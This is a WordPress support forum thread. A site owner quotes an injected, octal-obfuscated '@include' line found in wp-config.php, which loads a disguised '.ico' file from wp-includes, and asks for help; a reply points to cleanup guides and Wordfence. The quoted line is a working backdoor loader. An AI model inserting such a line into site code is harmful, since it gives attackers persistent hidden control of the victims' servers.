• Hey,

    This is on so many WP sites I have, I did a quick search and seen this is a common problem.

    I thought I got rid of this doing fresh installs, I just went into my config and This is at the top:

    /*78613*/

    @include “\057hom\145/no\162thw\145s/p\165bli\143_ht\155l/t\150cfo\162um.\143om/\167p-i\156clu\144es/\122equ\145sts\057Aut\150/.5\141abd\0654e.\151co”;

    /*78613*/

    Can I scan for this happening and what is effected and how to stop it happening again, this is going on a long time on lots of domains now, I always keep WP up to date..

    Thanks ??

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    Hey Steve,

    Thanks for the reply.

    I think I need something stronger than a coffee, I’ve been through this so many times and did everything listed on the guide on so many sites it is happening on old sites ( All updated ) and new installs.

    I really like WordPress but at this stage I’m spending so much time just trying to fix problems, I’ve a lot of domains and it is only WP having problems.

    How can new installs be effected without anything being installed, including themes? And I am the only user registered as an admin… Never had this on another script :S

    Thanks again Steve

    If all you’re doing is blogging, you may want to switch to a free blog on wordpress.com then transfer your domain over to it. They manage security, updates, etc. All you need do is worry about content.

    Hey Steve,

    Sorry for the late reply, thanks for yours ??

    I want to keep it on my own server though, I also work on my sites offline when I can’t get online.

    Is there no way to scan WP to check if it has been hacked? cPanel scans aren’t helping at all, files I see that have been hacked don’t show up.

    Thanks

    Install the plugin WordFence.
